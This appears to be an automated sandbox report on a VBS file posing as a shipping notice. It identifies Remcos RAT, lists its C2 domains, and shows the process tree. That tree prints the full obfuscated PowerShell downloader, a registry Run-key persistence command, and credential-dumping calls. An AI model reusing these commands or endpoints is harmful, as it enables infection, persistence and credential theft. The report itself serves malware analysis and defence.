Overview

overview

10

Static

static

1

awb_shippi...24.vbs

windows7-x64

10

awb_shippi...24.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-11-2024 07:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    awb_shipping_post_27112024224782020031808174CN27112024000001124.vbs

  • Size

    29KB

  • MD5

    2bd1468a7b92abec901b765e0096bb54

  • SHA1

    e82a0cf23beaf7b9082713f8c35bfbbac5aa9578

  • SHA256

    1d90d341b6aac839d683afe80e3ec87b73564abcdbb205fee5ba795f34af5db8

  • SHA512

    2a69b75c1d978394b8aa50e68359c7df7b5f65c0df410e2051bb71f4e7ae5d630d9d243e700cf11a156aef508613e15086a973f2cf218da653de80f2c0de0847

  • SSDEEP

    192:CBH/B1eRFrh86O1oFnZS1VvttRSPQUmKGTT3I8eEnUxMPzduNZQ7ilOHVMp4Vm5D:+a7VQ9jTbX3RM5wiz9g93U4j4bw4TZ02

Score
10/10
remcosa$iancollectiondiscoverypersistencerat

Malware Config

Extracted

Family

remcos

Botnet

A$ian

C2

iwarsut775laudryed1.duckdns.org:57484

iwarsut775laudryed1.duckdns.org:57483

iwarsut775laudryed2.duckdns.org:57484

iwarsut775laudryed3.duckdns.org:57484
Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    hmbnspt.dat

  • keylog_flag

    false

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    shibuetgtst-CR733Q

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 7 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
    collection
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\awb_shipping_post_27112024224782020031808174CN27112024000001124.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • System Network Configuration Discovery: Internet Connection Discovery
    • Suspicious use of WriteProcessMemory
    PID:3932
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$attributlinien='Ugudeligste118';;$Manfred0='Skumleris';;$Bondage='Terraces';;$Brachycera='katakinetomeric';;$Tvangsfjernelses='Miskicks';;$Shieldlessness=$host.Name;function Smokingjakkernes($Bhutaneren){If ($Shieldlessness) {$Forfgtelse=5} for ($Folen189=$Forfgtelse;;$Folen189+=6){if(!$Bhutaneren[$Folen189]) { break }$Datamngde+=$Bhutaneren[$Folen189]}$Datamngde}function Treddle($Gnawings248){ .($trannens) ($Gnawings248)}$Klimaer=Smokingjakkernes 'UndaznfebruEBaguetHelmh.CambiWCivilEVlgerbFo,teCDomssL evalimidteEMagi N MonoT';$Orante=Smokingjakkernes 'Pl.tyMAtmomoT,komz ,megiTrifolUnevalFn sla T pc/';$afparerer=Smokingjakkernes 'RaughT P,oblBaronsAfkna1 Styr2';$Sheathlike=' skri[Pan oNGu,loe SamtTFerma. terrSSyninESubh.rHalvnvKarteiKnudecDamseEstemmPobtruOmimesiUnreanSkatttSupermChezsaMoro.nsengeABeramg HaraEErfarRParke]Bedro: Floc: Hu ds .soaeChondCNervsUDy.eprSem tITheont BairYHillepzonkeRBefj,o Sup t FreeoSk ivc BalaoUnsorLStala=Unpai$ t lsa Bi,rF H,pppOphveAprodurTransEHjem,r,iskeEbraatr';$Orante+=Smokingjakkernes 'Haemu5ordsg.Anden0 Emen Sulta(Pre rW Uk,ii NontnRetsodForkooNaboew Hrecs,erde TangeNCous.TForv Ho o1Elkas0Aorta.Sav a0Em ro;.ntra B.llW DrifiThom n nowl6 Jing4Ete n;,gern kuffxTutun6Slug,4Sonar;decou ,abelrCha,kvGudbr:Komma1Bums.3Stig 1Whit .,olyp0Lutin)Apant S queGContueSkolecTo nykBistao Koke/Gcell2 unne0Opvis1Punga0 Ca n0Va.me1Ledet0 teri1Snyde VejtrFAggraiA visrPr ceeUnguefIn rgo MoslxJetpi/S,oun1Nappe3Skraa1Rigse.Calam0';$Hariolation=Smokingjakkernes 'Ch liuGlickSDisagEPsychr teer-Bouboa.atergUdskreS,iddnOlfe T';$sodapastillernes=Smokingjakkernes 'Sjkleh UndetJalapt.erivpSve isSekti:ation/lysin/detergVen la Rendr Prish booko TrimuEpuradSlyngjkon.moBlse,uNusserMiliemGenn .Traf.c Ha,noBa anmT ipl/Da.spm ByzoaTveden ururn Tilsir.klatti,baoKar,olSkud .Sk ftiAdsc.n inglf';$Solsejlet=Smokingjakkernes 'Eks.g>';$trannens=Smokingjakkernes 'KafirIOverseForm.X';$Cer='Eskadreronings';$Lament='\Geografens.Mis';Treddle (Smokingjakkernes ' Pseu$ cadeGGirlelWaldeo iconbSlo pa Bewil Ungd: Kem sGaz akLectuyIriagGBen.ag OrthEAmputMUbicaORef.eRPretoeImageL Lngd= dmar$ immEGeniunLogomvSmoor: StorA Mosep verpAp,iod odnoApolitTGiddyA rbej+ fort$ParallTypegARe mamA.moneIndlrn Catat');Treddle (Smokingjakkernes 'Snitf$Burgog Pin LStigeOAlexaBR,ppoa FoghlOp.pa:BordcpBin slPerseAK lons Het TmorphRDigebeReconn Edi.dOscineInnocsbrist= Imbl$Prgnis Theto,urvadKulegaUansvpurha Aau.ocS Bibltn ntrI UltrlHowdiLRecome RkkeR.orosnFlytteA ophSCap i.Ben osMoi apSalg.LAnalyiBok eT Psy,(Subun$Fist S ncloLeverlTiggesLat,he .camJF.ernLJ uncEtheriT Af,o)');Treddle (Smokingjakkernes $Sheathlike);$sodapastillernes=$Plastrendes[0];$Morphophonemics=(Smokingjakkernes 'Killi$SkglaGProj LCacodo S.rib Fi kAOphthlP nar: pstaR rngeukardasGaldtTRaadhKRejsea oentMOverbROpkloEDiver=jenf,NTry.nEVelcrw Mula-UdladOSneezb.prrej FetieUnallc ReintPa af OverSForfiytortuSPavilt gnbeRegn,MDiscu.inter$DeconKMelodLOversiTrummMT lkmACl.arEKolesr');Treddle ($Morphophonemics);Treddle (Smokingjakkernes ' Post$Oly pr rndeuEllets ilitt Sag kSvmmeaUnimpmKlikkrSinkce yth.BibliH.jedoe BirtaSurged andeK nderGotissLaryn[ Meta$ Stj H rynaMenulrpacifiAf kro B drlAsminaaa.detGeneri Plano un.rnBrass] Wo k=Penin$OccipOEntenr Naboa NgnenMusiktR,mune');$delustering=Smokingjakkernes ' Ener$ R,ndrFiniouTroldsBa kbtNonbokSammea Su,emBrun rUdebaeBerta. ,edtD CogioLi,htw Co.snUdtaglRatifoFlle aSemotdMortiFParali .kamlEncroe Tops( airn$ Ugess.astnoTvr.kd eknia ndicp DispaJokessNonuptPinchiDulselStvn.l FraneArrivrsnurrnEthyleVi iasHarne,Su,er$o iedAS rinlHa utiBrepom Skabe BlusnTrykstArbalaWent tinteli Sbreo.askin,ftaseberegrMinianTe nee Sluts Unpr)';$Alimentationernes=$Skyggemorel;Treddle (Smokingjakkernes 'befit$SkalkgHaandlMiscoobe ribSpri.aUdbrul Occl: SubgtMirjaaDeocupje doNTimbeI Mod nFyrvrgGrandESkrivRfastan LageEBrshaSSemi.=Inv.s(aort t Wa geVirusS.ylieTEarth-TilripHomo,aAntreTMedich Tran A kla$Dame AGaalgLB skvIPart m PolieUnaccNdagletNummeaBardetTaa,eiBrugeOAvancn la ie,aroeRJulebN.aasyeFunkts Yn.e)');while (!$tapningernes) {Treddle (Smokingjakkernes 'Grovv$FinmegLyksal reveoPerisb FireaGrumsl Palu:Die,eDReprei PinanS.eeduIndtgsUfo e=Gener$InterG C fio GesewKapitl') ;Treddle $delustering;Treddle (Smokingjakkernes 'CitroSRugosTDiverARets RModeot Pann-Af tusOxydel agerERentvESpankpTro p Spiro4');Treddle (Smokingjakkernes 'Inter$Sabbagspndil Cemeo Sam bKulkaASo delSortk: Ogh tFooteaHulkoPComplN T eniPartinSteveg CoveeSkydeR ydronRedoxeEpigoS Fart=Unesc(T,esaTScoptEGrfteSCipput onog- UnskpEmbryA MissTP,oviHSipho H,per$SkammA Apotl TreaiBioasMPantaeUnreonVit.cTGeronA MasutLayabIAlkovOR.guan Thi E olaRGalvaNInvilEFleawSOv ri)') ;Treddle (Smokingjakkernes 'Dansk$ Fo egBite LPincuOSk beBIrereaStrabLU,att: RestkDevieo TingnReri kGodelUS rumrConvorTesseeSmiderSelefeFinmas Sco.=Gentl$FelttG fteLUtilgo halvBBartlAUnchaLArres:CakebkCamelLanlgsiRebatpHeartP PregEUd.ajsHal lKStrikRDeteknLindoT D,meESirliRTaktfn A snEPerso3Spili7Lands+ Sub.+ phys%Refer$IditoPret.eLelemeaT kroS HandtQuadrRKl rkeInte nTilstdOrthoEAuspisBand .AffilCSolutO RatiuMetreNReitet') ;$sodapastillernes=$Plastrendes[$Konkurreres]}$Mouldier=290646;$Nickolajs=32703;Treddle (Smokingjakkernes 'Seg l$ beviGSuperlVanddoLysa bForviAFamislEmuls:P opeH OpslE Am nbJinksRM ddiE DikeWT,ntidP eusOBarnemRecad Oc po=Hjade ProviGpe iaeKderytskede- MickcProceO Vo yN evigTUnculEBen inAimfutF emh kul,u$ KorrAS perLChianIStudeMSmaabE Psyknkik.eTAffatAForbrt,tereIBenigo,dresNbevidE esboRYamskNS.ocheunderS');Treddle (Smokingjakkernes 'Aaben$BortfgRem.sl Om,tosygefbproa.aspejll Bjrn:noninF jemlaCarricBandao CayenSq.irsAfsentTrimee HernnBogyssNdsfa N nt=Sysop Fler[L koeSNon,ey IllusLe,ettCoveneC eckmK efa. oxteCUkraio RicknHvervvArg.meNyderrAnti tOrie ] Omko:Sq am: rspaFTreddrguldgoPhytomDirigBTerria ybstsDraabeForbu6Nurse4BlselSLicentAlmg rAcro iBjrnenSpe mgElli,(Titre$BndslHTheekedron.bCu tnrZygi.e S luwModerdOpruso.ociamOverb)');Treddle (Smokingjakkernes 'Resis$RustbGSe.vpLPigebO ProdBTriamaAurael Cyli:Ever SCivilhSpartASemeidBr geePukleTS,igmaO.stniTaverlMouly Blgek=Unfav Dyble[SkaftSHnderyPun tsFremmtBrevoEBombeMMesos.Reco,tLnm dEUnneixac eltPuerp.Bes,jEArmbrnDivotCbasilOReappdTubboIdiannNprivaGUvuli]progr: To g:AnbriaEm,lssInconcSmileiGangtIAdfrd.RepatgstillE LitutFidiaSP ssiTH emaRHuge itilbjnRejseGS yts(Spejl$ ,pdaFLingea Gun CMult OTubbiNOmgivSBlan.tEsta EDisconMadonS D mo)');Treddle (Smokingjakkernes 'Boner$ boliGInc uLDepreo KakiBFalanAHenfalS,pra: SlipUSphyrN poplDUntapeHsltfRAutomfUndanIShan.lPreprLTilba=Hadic$SkattsEjsakhCa paAElec.DSauroe.vereTEelboAI coriGtranlDeerh.Slhu SNonseu EntebProgrSlill,TDunlirH rebIMilj N TorsG F,rb( Base$ Mo.iM ForsONo,diu aa.eLEndeldInoffiUnpuceStillrCardi,Morta$arbejNTradiISyntec TrudK iolioFredsL FaelaExegeJRepr s Fanf)');Treddle $Underfill;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4952
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$attributlinien='Ugudeligste118';;$Manfred0='Skumleris';;$Bondage='Terraces';;$Brachycera='katakinetomeric';;$Tvangsfjernelses='Miskicks';;$Shieldlessness=$host.Name;function Smokingjakkernes($Bhutaneren){If ($Shieldlessness) {$Forfgtelse=5} for ($Folen189=$Forfgtelse;;$Folen189+=6){if(!$Bhutaneren[$Folen189]) { break }$Datamngde+=$Bhutaneren[$Folen189]}$Datamngde}function Treddle($Gnawings248){ .($trannens) ($Gnawings248)}$Klimaer=Smokingjakkernes 'UndaznfebruEBaguetHelmh.CambiWCivilEVlgerbFo,teCDomssL evalimidteEMagi N MonoT';$Orante=Smokingjakkernes 'Pl.tyMAtmomoT,komz ,megiTrifolUnevalFn sla T pc/';$afparerer=Smokingjakkernes 'RaughT P,oblBaronsAfkna1 Styr2';$Sheathlike=' skri[Pan oNGu,loe SamtTFerma. terrSSyninESubh.rHalvnvKarteiKnudecDamseEstemmPobtruOmimesiUnreanSkatttSupermChezsaMoro.nsengeABeramg HaraEErfarRParke]Bedro: Floc: Hu ds .soaeChondCNervsUDy.eprSem tITheont BairYHillepzonkeRBefj,o Sup t FreeoSk ivc BalaoUnsorLStala=Unpai$ t lsa Bi,rF H,pppOphveAprodurTransEHjem,r,iskeEbraatr';$Orante+=Smokingjakkernes 'Haemu5ordsg.Anden0 Emen Sulta(Pre rW Uk,ii NontnRetsodForkooNaboew Hrecs,erde TangeNCous.TForv Ho o1Elkas0Aorta.Sav a0Em ro;.ntra B.llW DrifiThom n nowl6 Jing4Ete n;,gern kuffxTutun6Slug,4Sonar;decou ,abelrCha,kvGudbr:Komma1Bums.3Stig 1Whit .,olyp0Lutin)Apant S queGContueSkolecTo nykBistao Koke/Gcell2 unne0Opvis1Punga0 Ca n0Va.me1Ledet0 teri1Snyde VejtrFAggraiA visrPr ceeUnguefIn rgo MoslxJetpi/S,oun1Nappe3Skraa1Rigse.Calam0';$Hariolation=Smokingjakkernes 'Ch liuGlickSDisagEPsychr teer-Bouboa.atergUdskreS,iddnOlfe T';$sodapastillernes=Smokingjakkernes 'Sjkleh UndetJalapt.erivpSve isSekti:ation/lysin/detergVen la Rendr Prish booko TrimuEpuradSlyngjkon.moBlse,uNusserMiliemGenn .Traf.c Ha,noBa anmT ipl/Da.spm ByzoaTveden ururn Tilsir.klatti,baoKar,olSkud .Sk ftiAdsc.n inglf';$Solsejlet=Smokingjakkernes 'Eks.g>';$trannens=Smokingjakkernes 'KafirIOverseForm.X';$Cer='Eskadreronings';$Lament='\Geografens.Mis';Treddle (Smokingjakkernes ' Pseu$ cadeGGirlelWaldeo iconbSlo pa Bewil Ungd: Kem sGaz akLectuyIriagGBen.ag OrthEAmputMUbicaORef.eRPretoeImageL Lngd= dmar$ immEGeniunLogomvSmoor: StorA Mosep verpAp,iod odnoApolitTGiddyA rbej+ fort$ParallTypegARe mamA.moneIndlrn Catat');Treddle (Smokingjakkernes 'Snitf$Burgog Pin LStigeOAlexaBR,ppoa FoghlOp.pa:BordcpBin slPerseAK lons Het TmorphRDigebeReconn Edi.dOscineInnocsbrist= Imbl$Prgnis Theto,urvadKulegaUansvpurha Aau.ocS Bibltn ntrI UltrlHowdiLRecome RkkeR.orosnFlytteA ophSCap i.Ben osMoi apSalg.LAnalyiBok eT Psy,(Subun$Fist S ncloLeverlTiggesLat,he .camJF.ernLJ uncEtheriT Af,o)');Treddle (Smokingjakkernes $Sheathlike);$sodapastillernes=$Plastrendes[0];$Morphophonemics=(Smokingjakkernes 'Killi$SkglaGProj LCacodo S.rib Fi kAOphthlP nar: pstaR rngeukardasGaldtTRaadhKRejsea oentMOverbROpkloEDiver=jenf,NTry.nEVelcrw Mula-UdladOSneezb.prrej FetieUnallc ReintPa af OverSForfiytortuSPavilt gnbeRegn,MDiscu.inter$DeconKMelodLOversiTrummMT lkmACl.arEKolesr');Treddle ($Morphophonemics);Treddle (Smokingjakkernes ' Post$Oly pr rndeuEllets ilitt Sag kSvmmeaUnimpmKlikkrSinkce yth.BibliH.jedoe BirtaSurged andeK nderGotissLaryn[ Meta$ Stj H rynaMenulrpacifiAf kro B drlAsminaaa.detGeneri Plano un.rnBrass] Wo k=Penin$OccipOEntenr Naboa NgnenMusiktR,mune');$delustering=Smokingjakkernes ' Ener$ R,ndrFiniouTroldsBa kbtNonbokSammea Su,emBrun rUdebaeBerta. ,edtD CogioLi,htw Co.snUdtaglRatifoFlle aSemotdMortiFParali .kamlEncroe Tops( airn$ Ugess.astnoTvr.kd eknia ndicp DispaJokessNonuptPinchiDulselStvn.l FraneArrivrsnurrnEthyleVi iasHarne,Su,er$o iedAS rinlHa utiBrepom Skabe BlusnTrykstArbalaWent tinteli Sbreo.askin,ftaseberegrMinianTe nee Sluts Unpr)';$Alimentationernes=$Skyggemorel;Treddle (Smokingjakkernes 'befit$SkalkgHaandlMiscoobe ribSpri.aUdbrul Occl: SubgtMirjaaDeocupje doNTimbeI Mod nFyrvrgGrandESkrivRfastan LageEBrshaSSemi.=Inv.s(aort t Wa geVirusS.ylieTEarth-TilripHomo,aAntreTMedich Tran A kla$Dame AGaalgLB skvIPart m PolieUnaccNdagletNummeaBardetTaa,eiBrugeOAvancn la ie,aroeRJulebN.aasyeFunkts Yn.e)');while (!$tapningernes) {Treddle (Smokingjakkernes 'Grovv$FinmegLyksal reveoPerisb FireaGrumsl Palu:Die,eDReprei PinanS.eeduIndtgsUfo e=Gener$InterG C fio GesewKapitl') ;Treddle $delustering;Treddle (Smokingjakkernes 'CitroSRugosTDiverARets RModeot Pann-Af tusOxydel agerERentvESpankpTro p Spiro4');Treddle (Smokingjakkernes 'Inter$Sabbagspndil Cemeo Sam bKulkaASo delSortk: Ogh tFooteaHulkoPComplN T eniPartinSteveg CoveeSkydeR ydronRedoxeEpigoS Fart=Unesc(T,esaTScoptEGrfteSCipput onog- UnskpEmbryA MissTP,oviHSipho H,per$SkammA Apotl TreaiBioasMPantaeUnreonVit.cTGeronA MasutLayabIAlkovOR.guan Thi E olaRGalvaNInvilEFleawSOv ri)') ;Treddle (Smokingjakkernes 'Dansk$ Fo egBite LPincuOSk beBIrereaStrabLU,att: RestkDevieo TingnReri kGodelUS rumrConvorTesseeSmiderSelefeFinmas Sco.=Gentl$FelttG fteLUtilgo halvBBartlAUnchaLArres:CakebkCamelLanlgsiRebatpHeartP PregEUd.ajsHal lKStrikRDeteknLindoT D,meESirliRTaktfn A snEPerso3Spili7Lands+ Sub.+ phys%Refer$IditoPret.eLelemeaT kroS HandtQuadrRKl rkeInte nTilstdOrthoEAuspisBand .AffilCSolutO RatiuMetreNReitet') ;$sodapastillernes=$Plastrendes[$Konkurreres]}$Mouldier=290646;$Nickolajs=32703;Treddle (Smokingjakkernes 'Seg l$ beviGSuperlVanddoLysa bForviAFamislEmuls:P opeH OpslE Am nbJinksRM ddiE DikeWT,ntidP eusOBarnemRecad Oc po=Hjade ProviGpe iaeKderytskede- MickcProceO Vo yN evigTUnculEBen inAimfutF emh kul,u$ KorrAS perLChianIStudeMSmaabE Psyknkik.eTAffatAForbrt,tereIBenigo,dresNbevidE esboRYamskNS.ocheunderS');Treddle (Smokingjakkernes 'Aaben$BortfgRem.sl Om,tosygefbproa.aspejll Bjrn:noninF jemlaCarricBandao CayenSq.irsAfsentTrimee HernnBogyssNdsfa N nt=Sysop Fler[L koeSNon,ey IllusLe,ettCoveneC eckmK efa. oxteCUkraio RicknHvervvArg.meNyderrAnti tOrie ] Omko:Sq am: rspaFTreddrguldgoPhytomDirigBTerria ybstsDraabeForbu6Nurse4BlselSLicentAlmg rAcro iBjrnenSpe mgElli,(Titre$BndslHTheekedron.bCu tnrZygi.e S luwModerdOpruso.ociamOverb)');Treddle (Smokingjakkernes 'Resis$RustbGSe.vpLPigebO ProdBTriamaAurael Cyli:Ever SCivilhSpartASemeidBr geePukleTS,igmaO.stniTaverlMouly Blgek=Unfav Dyble[SkaftSHnderyPun tsFremmtBrevoEBombeMMesos.Reco,tLnm dEUnneixac eltPuerp.Bes,jEArmbrnDivotCbasilOReappdTubboIdiannNprivaGUvuli]progr: To g:AnbriaEm,lssInconcSmileiGangtIAdfrd.RepatgstillE LitutFidiaSP ssiTH emaRHuge itilbjnRejseGS yts(Spejl$ ,pdaFLingea Gun CMult OTubbiNOmgivSBlan.tEsta EDisconMadonS D mo)');Treddle (Smokingjakkernes 'Boner$ boliGInc uLDepreo KakiBFalanAHenfalS,pra: SlipUSphyrN poplDUntapeHsltfRAutomfUndanIShan.lPreprLTilba=Hadic$SkattsEjsakhCa paAElec.DSauroe.vereTEelboAI coriGtranlDeerh.Slhu SNonseu EntebProgrSlill,TDunlirH rebIMilj N TorsG F,rb( Base$ Mo.iM ForsONo,diu aa.eLEndeldInoffiUnpuceStillrCardi,Morta$arbejNTradiISyntec TrudK iolioFredsL FaelaExegeJRepr s Fanf)');Treddle $Underfill;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2200
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2548
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Beregningsudtryks" /t REG_EXPAND_SZ /d "%Fdselsattester223% -windowstyle 1 $Delkrederekontoen=(gp -Path 'HKCU:\Software\Poliomyelitises\').Affettuosos;%Fdselsattester223% ($Delkrederekontoen)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2792
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Beregningsudtryks" /t REG_EXPAND_SZ /d "%Fdselsattester223% -windowstyle 1 $Delkrederekontoen=(gp -Path 'HKCU:\Software\Poliomyelitises\').Affettuosos;%Fdselsattester223% ($Delkrederekontoen)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:1880
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\awaxlurpaqsipnqdvkigbahq"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4176
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\kqnimmcroyknzbfpfuuimfcztzne"
        3⤵
        • Accesses Microsoft Outlook accounts
        • System Location Discovery: System Language Discovery
        PID:5080
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\vktamfmkcgcsbibtwfhjpsoqbffnrtz"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4448

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    71444def27770d9071039d005d0323b7

    SHA1

    cef8654e95495786ac9347494f4417819373427e

    SHA256

    8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9

    SHA512

    a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_250umtdq.0mw.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\awaxlurpaqsipnqdvkigbahq
    Filesize

    4KB

    MD5

    c3c5f2de99b7486f697634681e21bab0

    SHA1

    00f90d495c0b2b63fde6532e033fdd2ade25633d

    SHA256

    76296dc29f718988107d35d0e0b835c2bf3fc7405e79e5121aa4738f82b51582

    SHA512

    7c60ffdc093de30e793d20768877f2f586bee3e948767871f9a1139252d5d2f593ba6f88ce0ed5f72c79faddb26186792df0581e4b6c84d405c44d9d12f951b8

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Geografens.Mis
    Filesize

    421KB

    MD5

    213e02988b4d838fdbf175c96f49eefb

    SHA1

    29190ed3fd5aa65328b312cfa952a95c752297b0

    SHA256

    1d198b573d3f3715ab7066d7d42eb11c0f69c542d055f6f73abc5cc4d7b82429

    SHA512

    b815a41b58ff9d204f53d2ee8fca3327f916b0b0d65c154a59a0b46026ad6a3784b074cc361be3535e3b421ef8e4b2cf4b222050f9f1b3a15481f1d2fe6bb55a

    Download Submit

  • memory/2200-43-0x0000000007600000-0x0000000007696000-memory.dmp

    Filesize

    600KB

    Download

  • memory/2200-42-0x00000000068C0000-0x00000000068DA000-memory.dmp

    Filesize

    104KB

    Download

  • memory/2200-47-0x0000000008DA0000-0x000000000CF95000-memory.dmp

    Filesize

    66.0MB

    Download

  • memory/2200-23-0x0000000004DB0000-0x0000000004DE6000-memory.dmp

    Filesize

    216KB

    Download

  • memory/2200-24-0x0000000005420000-0x0000000005A48000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/2200-25-0x0000000005AB0000-0x0000000005AD2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/2200-26-0x0000000005B50000-0x0000000005BB6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/2200-27-0x0000000005C70000-0x0000000005CD6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/2200-37-0x0000000005D20000-0x0000000006074000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/2200-45-0x00000000087F0000-0x0000000008D94000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/2200-39-0x0000000006350000-0x000000000636E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/2200-40-0x0000000006380000-0x00000000063CC000-memory.dmp

    Filesize

    304KB

    Download

  • memory/2200-41-0x0000000007BC0000-0x000000000823A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/2200-44-0x0000000007560000-0x0000000007582000-memory.dmp

    Filesize

    136KB

    Download

  • memory/2548-75-0x00000000226D0000-0x00000000226E9000-memory.dmp

    Filesize

    100KB

    Download

  • memory/2548-79-0x00000000226D0000-0x00000000226E9000-memory.dmp

    Filesize

    100KB

    Download

  • memory/2548-78-0x00000000226D0000-0x00000000226E9000-memory.dmp

    Filesize

    100KB

    Download

  • memory/2548-56-0x0000000000B40000-0x0000000001D94000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/4176-63-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

    Download

  • memory/4176-59-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

    Download

  • memory/4176-61-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

    Download

  • memory/4176-65-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

    Download

  • memory/4448-68-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

    Download

  • memory/4448-67-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

    Download

  • memory/4448-69-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

    Download

  • memory/4952-16-0x00007FFCD4320000-0x00007FFCD4DE1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4952-15-0x00007FFCD4320000-0x00007FFCD4DE1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4952-5-0x000001A7503E0000-0x000001A750402000-memory.dmp

